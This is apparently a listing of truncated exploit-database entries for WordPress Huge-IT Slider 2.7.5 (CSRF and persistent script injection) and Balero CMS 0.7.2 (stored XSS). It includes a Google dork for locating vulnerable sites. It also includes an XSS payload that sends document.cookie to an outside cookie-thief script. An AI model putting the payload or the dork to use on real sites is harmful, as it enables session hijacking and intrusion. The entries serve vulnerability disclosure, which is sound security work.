WordPress Huge-IT Slider 2.7.5 - Multiple Vulnerabilities

Exploit for php platform in category web applications Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion Date: 2015-06-23 Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/" Exploit Author: Joaquin Ramirez...

WordPress Huge IT Slider Plugin 2.7.5 - Multiple Vulnerabilities

There are multiple vulnerabilities in this plugin, such as cross-site request forgery and Persistent JS/HTML Injection. These vulnerabilities allow an attacker to make a user with access privileges to a page and inject JavaScript into the database. Solution Upgrade the plugin...

Balero CMS 0.7.2 - Multiple JSHTML Injection Vulnerabilities

Balero CMS 0.7.2 - Multiple JSHTML Injection Vulnerabilities document.cookie="counter=1confirm'XSS'; path=/balerocms/"; csrf+stored xss+filter bypass+session hijack: document.location="http://www.zeroscience.mk/pent...

Balero CMS 0.7.2 Cross Site Scripting

document.cookie="counter=1confirm'XSS'; path=/balerocms/"; csrf+stored xss+filter bypass+session hijack: document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;"...